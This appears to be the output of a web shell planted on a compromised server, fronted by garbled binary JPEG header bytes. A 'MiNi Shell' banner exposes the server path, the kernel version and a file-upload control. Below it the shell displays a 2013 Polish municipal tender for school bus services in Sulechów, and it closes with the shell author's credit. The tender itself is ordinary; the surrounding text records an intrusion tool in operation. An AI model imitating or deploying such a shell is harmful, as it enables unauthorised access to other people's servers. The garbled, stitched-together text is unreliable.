JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130702/130519-N-2013.html

<p class="kh_header"><b>Sulechów: Dowozy dzieci do szkół na terenie Gminy Sulechów - II półrocze 2013 r.</b><br>
<b>Numer ogłoszenia: 130519 - 2013; data zamieszczenia: 02.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulechów , Plac Ratuszowy 6, 66-100 Sulechów, woj. lubuskie, tel. 068 3851120, faks 068 3854686.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowozy dzieci do szkół na terenie Gminy Sulechów - II półrocze 2013 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest realizacja od 1 września 2013 do 31 grudnia 2013 r. usług transportowych - autobusowe przewozy uczniów szkół podstawowych i gimnazjów oraz dzieci odbywających przygotowanie przedszkolne w przedszkolach i oddziałach przedszkol-nych na terenie Gminy Sulechów. 
2.	Dzieci mają być przewożone (dowozy i odwozy) w dni nauki szkolnej do szkół podstawo-wych w: Kijach, Cigacicach, Bukowie, Brodach, Sulechowie - Szkoła Podstawowa nr 1 i Szkoła Podstawowa nr 3 w Zespole Szkół oraz do Gimnazjum w Pomorsku, do Gimnazjum nr 2 w Sulechowie przy ul. 1-go Maja, do Gimnazjum nr 3 w Zespole Szkół w Sulechowie przy ul. Piaskowej 53, a także do Specjalnego Ośrodka Szkolno Wychowawczego w Sule-chowie.
3.	Dowozy realizowane będą w miesiącach nauki szkolnej - przewiduje się 4 miesiące
w całym okresie realizacji zamówienia.
4.	Ogólne warunki przywozu i odwozu dzieci:
Do Szkoły Podstawowej w Brodach, ul. Jagielnicka 97, 66-100 Brody dzieci będą dowożone z miejscowości:
1.	POMORSKO 27 osób
Razem: 27 osób
Do Szkoły Podstawowej im. Leona Kruczkowskiego w Cigacicach, ul. Plac Szkolny 10 66-131 Cigacice dzieci będą dowożone z miejscowości:
2.	GÓRZYKOWO 19 osób
3.	GÓRKI MAŁE 9 osób
4.	NOWY ŚWIAT 4 osoby
Razem: 32 osób
Do Gimnazjum w Pomorsku, ul. Bolesława Chrobrego 51, 66-105 Pomorsko dzieci będą dowo-żone z miejscowości:
1.	BRODY 21 osób
2.	GŁOGUSZ 5 osób
3.	KIJE 13 osób
4.	KIJE - GÓRY B (KIJE OSIEDLE) 5 osoby
Razem: 44 osoby
Do Szkoły Podstawowej w Bukowie, Buków 53, 66-120 Sulechów dzieci będą dowożone z miejscowości:
1.	ŁĘGOWO 9 osób
2.	OKUNIN 17 osób
3.	KARCZYN 9 osób
4.	PRZYGUBIEL 2 osoby
Razem: 37 osób
Do Szkoły Podstawowej w Kijach, Kije 141 A, 66-100 Sulechów dzieci będą dowożone z miejscowości:
1.	GŁOGUSZ 10 osób
2.	KIJE - GÓRY B. (KIJE OSIEDLE) 4 osoby
Razem: 14 osób
Do Gimnazjum nr 2 im. Jana Pawła II w Sulechowie, ul. 1 Maja 7, 66-100 Sulechów dzieci będą dowożone z miejscowości:
1.	BUKÓW 27 osób
2.	ŁĘGOWO 5 osoby 
3.	KLĘPSK 21 osoby
4.	OKUNIN 1 osoba
5.	KALSK 23 osoby
6.	CIGACICE 8 osób
7.	GÓRKI MAŁE 2 osoby
8.	GÓRZYKOWO 9 osób
9.	KARCZYN 2 osoby
Razem: 98 osób
Do Zespołu Szkół w Sulechowie: ul. Piaskowa 52,66-100 Sulechów dzieci będą dowożone z miejscowości:
1.	MOZÓW 39 osób
2.	CIGACICE 6 osób
3.	GÓRZYKOWO 2 osoby 
4.	GÓRKI MAŁE 1 osoba
5.	NOWY ŚWIAT 4 osoby
6.	KALSK 10 osób
7.	BUKÓW 2 osoby
8.	OKUNIN 1 osoba
9.	KLĘPSK 2 osoby
10.	NOWY ŚWIAT/BORYŃ 4 osoby
Razem: 71 osoby
Do Szkoły Podstawowej nr 1 im. gen. Józefa Bema w Sulechowie, ul. 31 Stycznia 23, 66-100 Sulechów dzieci będą dowożone z miejscowości:
-	KLĘPSK 55 osób
-	OKUNIN 2 osoby
-	MOZÓW 1 osoba
Razem: 58 osoby
Do Specjalnego Ośrodka Szkolno-Wychowawczego w Sulechowie, ul. Łączna 1, 66-100 Sule-chów dzieci będą dowożone z terenu całej Gminy: 
-	BUKÓW 3 osoby
-	ŁĘGOWO 3 osoby
-	GÓRZYKOWO 1 osoba
-	CIGACICE - GÓRZYKOWO 1 osoba
-	KIJE - GÓRZYKOWO 1 osoba
-	BRODY 1 osoba
-	GŁOGUSZ 1 osoba
-	KIJE 1 osoba
Razem: 12 osób
Do Liceum Ogólnokształcącego w Sulechowie, ul Licealna 10, 66-100 Sulechów dzieci będą do-wożone z miejscowości:
-	KLĘPSK 1 osoba
Razem: 1 osoba
5.	 Korzystanie z przewozów odbywać się będzie na podstawie biletów miesięcznych wydanych przez Przewoźnika.
6.	Liczba dzieci wraz z opiekunami delegowanymi ze szkół oraz godziny przewozów wynikać będą z aktualnych planów lekcji w poszczególnych szkołach.
7.	Zamawiający dostarczy Wykonawcy przed rozpoczęciem każdego miesiąca, jednak nie później niż do 20 dnia każdego miesiąca w okresie wrzesień- grudzień 2013 r. aktualny wykaz uczniów dowożonych oraz uzgodni godziny przywozów (dowozów i odwozów) w poszczególnych szko-łach, w celu ekonomicznego ustalenia tras przewozowych - przewozy łączone do gimnazjów i szkół podstawowych. W przypadku zmiany planu lekcji w czasie roku szkolnego dyrektorzy in-formować będą Przewoźnika, z 7 dniowym wyprzedzeniem, o zaistniałych zmianach. 
8.	Zleceniodawca zastrzega sobie możliwość zmiany tras i miejscowości do których będą odwożone dzieci.
9.	Orientacyjna liczba dzieci wynosi 394 w trakcie realizacji zamówienia.
10.	Liczba opiekunów delegowanych ze szkół wynosi 34.
11.	Orientacyjna, dzienna ogólna długość tras w okresie wrzesień - grudzień 2013 w przypadku przewozów łączonych wynosić będzie ok. 450 km.
12.	Orientacyjną liczbę dzieci w rozłożeniu na przewidywane trasy obrazuje tabela:
Lp.	TRASY AUTOBUSÓW SZKOLNYCH	Liczba dzieci przewi-dzianych do przewo-zu w roku 2013 (stan na 20 czerwca 2013 r.)
1	OKUNIN - ŁĘGOWO - KARCZYN - PRZYGUBIEL - BUKÓW SZKOŁA	37
2	GŁOGUSZ - KIJE - KIJE GÓRY B - POMORSKO	40
3	POMORSKO - LASKOWO - BRODY - POMORSKO	48
4	NOWY ŚWIAT - GÓRZYKOWO - GÓRKI MAŁE - CI-GACICE - LEŚNA GÓRA - CIGACICE - GÓRKI MAŁE - GÓRZYKOWO - NOWY ŚWIAT - SULECHÓW	72
5	OKUNIN - KLĘPSK - SULECHÓW	27
6	KLĘPSK - SULECHÓW	56
7	MOZÓW - SULECHÓW	39
8	KALSK - SULECHÓW	33
9	BUKÓW - PRZYGUBIEL - KARCZYN - NOWY KLĘPSK - ŁĘGOWO - SULECHÓW	42
10	BRODY - SULECHÓW	1
11	NOWY ŚWIAT/BORYŃ K - SULECHÓW	4
13.	Gmina Sulechów do realizacji dowozów dzieci do szkół odda wybranemu Wykonawcy w użyczenie autobus marki JELCZ L090M zwany GIMBUSEM. Wykonawca ponosi koszty związane z utrzymaniem i eksploatacją GIMBUSA, a w szczególności:
-	koszty rejestracji,
-	koszty paliwa
-	koszty ubezpieczenia OC, NW, AC,
-	koszty podatku od środków transportu.
14.	Zamawiający upoważni Wykonawcę do wyboru dowolnego ubezpieczyciela. Wykonawcę ob-ciąża ryzyko uszkodzenia, utraty GIMBUSA.
15.	Wykonawca określi wartość w złotych za 1 miesiąc realizowanych dowozów na podstawie jednostkowych cen biletów na poszczególnych trasach oraz ilości przewożonych dzieci. Suma wartości 4 miesięcy w całym okresie realizacji zamówienia nie może być wyższa niż kwota przewidziana przez zamawiającego.
16.	Zamawiający nie dopuszcza składania ofert wariantowych ani częściowych.
17.	Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
18.	Wszędzie tam gdzie Zamawiający użył nazw własnych dopuszcza składanie ofert równoważ-nych.
19.	Zamawiający nie będzie dokonywał wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 3.000,00 zł (słownie: trzy tysiące złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać licencje wynikające z ustawy o transporcie drogowym</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się zrealizowaniem, udokumentowanym np. referencjami lub innymi dokumentami w okresie ostatnich 3 lat, minimum 1 (jednego) zamówienia o charakterze i zło-żoności porównywalnej z zakresem niniejszego zamówienia tj. wykonywaniem usług związanych ze zbiorowym przewozem osób</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi mieć do dyspozycji  lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego tj. w pełni sprawne technicznie minimum 7 autobusów, w tym 2 autobusy o ilości minimum 65 miejsc siedzących</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonywania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonywania zamówienia tj. minimum 7 kierowców uprawnionych do kierowania autobusami. Kierowcy po-winni posiadać wymagane aktualne uprawnienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz oferty na załączniku nr 1.
2.	Wypełnione dane Wykonawcy na załączniku nr 1a.
3.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów na zasadach określonych w ustawie PZP. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do odda-nia mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
4.	W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udziele-nie zamówienia:
a)	zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają oni pełno-mocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo 
reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicz-nego, pełnomocnictwo to musi być podpisane przez wszystkich Wykonawców,
b)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowią-zany jest złożyć wszystkie dokumenty dotyczące właściwości Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonanie zmian w umowie dotyczących:
a)	stawki podatku od towarów i usług w przypadku ustawowej zmiany stawek, a w konsekwen-cji zmiany (podwyższenia lub obniżenia) kwoty brutto wynikającej z umowy,
b)	nazwy zadania, numerów kont bankowych oraz działów, rozdziałów i paragrafów klasyfikacji budżetowej,
c)	przedstawicieli stron.
d)	Zamawiający zastrzega, że liczba dzieci podana, odpowiada prognozowanemu stanowi na dzień 20 czerwca 2013 r. i może ulec zmianie w trakcie trwania umowy z przyczyn niezależ-nych od Zamawiającego. Zmiana liczby dzieci i wydanych biletów miesięcznych powodować będzie odpowiednie obniżenie lub podwyższenie wynagrodzenia Przewoźnika za dany okres realizacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sulechow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Sulechów Plac Ratuszowy 6 66-100 Sulechów pokój nr 119b.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2013 godzina 10:30, miejsce: Gmina Sulechów Plac Ratuszowy 6 66-100 Sulechów pokój nr 002 - Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com